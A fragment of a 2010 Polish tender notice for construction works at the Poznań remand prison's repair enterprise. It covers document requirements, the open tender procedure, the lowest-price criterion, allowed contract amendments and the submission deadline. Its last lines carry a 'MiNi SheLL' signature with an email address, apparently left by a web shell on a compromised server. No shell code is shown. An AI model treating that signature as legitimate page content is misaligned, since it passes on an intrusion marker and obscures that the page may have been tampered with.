<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dokumenty i oświadczenia o  których mowa: 
      a)  w pkt. III 4. 1 winny być złożone  w taki sposób, aby potwierdzały łączne spełnianie warunków o których mowa w pkt. III.3 
     b)  w pkt. III 4.2 składa odrębnie każdy z Wykonawców występujących wspólnie 
2. Wszystkie dołączone dokumenty, winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
3.   W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku   podmiotów, o których mowa w pkt III 4.2 kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów powinny być poświadczane za zgodność z oryginałem przez Wykonawcę 
lub te podmioty.
4.   Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w następującym zakresie: a) wysokości wynagrodzenia w przypadku: 1) zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy, 2) ograniczenia zakresu prac objętych niniejszą umową w przypadku stwierdzenia braku konieczności wykonywania części zamówienia, ujętych w przedmiarze robót, 3) ograniczenia zakresu prac objętych niniejszą umową w przypadku zastosowania zmian opisanych w pkt. d). 4) zastosowania równoważnych materiałów, urządzeń, w stosunku do materiałów, urządzeń proponowanych w przedmiarze robót, ale o cenach jednostkowych niższych niż przyjęte w ofercie Wykonawcy, 5) konieczności ograniczenia lub zwiększenia zakresu robót w wyniku etapowania prac określonych w przedmiocie zamówienia. b) terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana: 1) warunkami pogodowymi uniemożliwiającymi wykonywanie prac zewnętrznych, 2) epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym, 3) trudnościami w nabyciu materiałów i urządzeń wynikającymi z długotrwałego spadku podaży tych towarów lub innych przyczyn niezależnych od obu Stron umowy, 4) następstwem okoliczności leżących po stronie Zamawiającego, takich jak: utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 5) koniecznością wprowadzenia zmian w przedmiarze robót na etapie wykonawstwa robót z przyczyn niezależnych od obu stron, aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, 6) koniecznością wykonania robót dodatkowych, wpływających na termin wykonania robót objętych niniejszą umową podstawową, 7) następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień, 8) następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, c) kolejności i terminu wykonania robót określonych w harmonogramie realizacji robót, d) jakości lub innych parametrów materiałów lub urządzeń zaoferowanych w ofercie, przy czym zmiana taka może być spowodowana: 1) niedostępnością na rynku materiałów lub urządzeń wskazanych w przedmiarze robót, czy specyfikacji technicznej wykonania i odbioru robót, spowodowaną zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń; 2) pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na: - zaoszczędzenie kosztów realizacji przedmiotu umowy, kosztów eksploatacji wykonanego przedmiotu umowy, umożliwiające uzyskanie lepszej jakości robót - poprawę warunków bezpieczeństwa i eksploatacji w przyszłym obiekcie; 3) pojawieniem się nowszej technologii wykonania zaprojektowanych robót pozwalającej na: - zaoszczędzenie czasu realizacji inwestycji - kosztów wykonywanych prac, kosztów eksploatacji wykonanego przedmiotu umowy, umożliwiające uzyskanie lepszej jakości robót; - poprawę warunków bezpieczeństwa i eksploatacji w przyszłym obiekcie; 4) koniecznością zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w przedmiarze robót, czy specyfikacji technicznej wykonania i odbioru robót budowlanych w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy; 5) odmiennymi od przyjętych w przedmiarze robót, specyfikacji technicznej wykonania i odbioru robót budowlanych warunkami terenowymi; 6) koniecznością zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa; 7) koniecznością usunięcia sprzeczności w dokumentacji; e) Zamawiający zastrzega sobie również możliwość wprowadzenia robót zamiennych w stosunku do ujętych w ofercie. Zakres tych robót zostanie ustalony w protokole konieczności sporządzonym przez Zamawiającego przy udziale Użytkownika i Wykonawcy. Wykonawca zobowiązuje się wykonać te roboty przy zachowaniu tych samych norm i standardów i nośników cenotwórczych. f) osób przewidzianych do realizacji zamówienia przez Wykonawcę w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w umowie. g) podwykonawcy, jeżeli podwykonawca nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z Wykonawcą - z zachowaniem trybu postępowania opisanego w § 9 niniejszej umowy. h) zmiany zakresu części prac powierzonych podwykonawcy w przypadku gdy: 1) konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest rozwiązaniem umów o pracę z pracownikami wykonującymi pracę w danej branży w takiej liczbie, która uniemożliwia realizację prac przez Wykonawcę, 2) wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia, 3) konieczność powierzenia prac podwykonawcy jest wynikiem zmiany technologii robót lub materiałów, 4) w przypadku opóźnień zapewni terminową realizację przedmiotu umowy, z zastrzeżeniem trybu opisanego w § 9. 4. Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę. 5. Warunkiem dokonania zmian, o których mowa w ust. 3 jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian zgodnie z zasadami określonymi w ust. 6, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy, opis wpływu zmiany na harmonogram robót i termin wykonania umowy. 6. Podstawę obliczenia kosztów zmiany mającej wpływ na wynagrodzenie Wykonawcy stanowić będzie zatwierdzony przez Zamawiającego: a) przedmiar robót zamienny, jeżeli wynika ona ze zmiany przedmiaru robót lub specyfikacji technicznej wykonania i odbioru robót budowlanych, b) kosztorys ofertowy opracowany na podstawie cen jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do sporządzenia kosztorysu ofertowego Wykonawcy, a w odniesieniu do nie występujących w kosztorysie ofertowym materiałów i sprzętu według cen jednostkowych zaproponowanych przez Wykonawcę, ale nie wyższych niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych. 7. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 3 pkt b) termin zakończenia robót może ulec odpowiedniemu przedłużeniu, nie dłużej jednak niż o okres trwania tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpzrb.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.gpzrb.com.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2010 godzina 10:00, miejsce: Gospodarstwo Pomocnicze Zakład Remontowo Budowlany przy Areszcie Śledczym w Poznaniu, ul. Młyńska 1, 61-729 Poznań, w sekretariacie II p. pok. 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com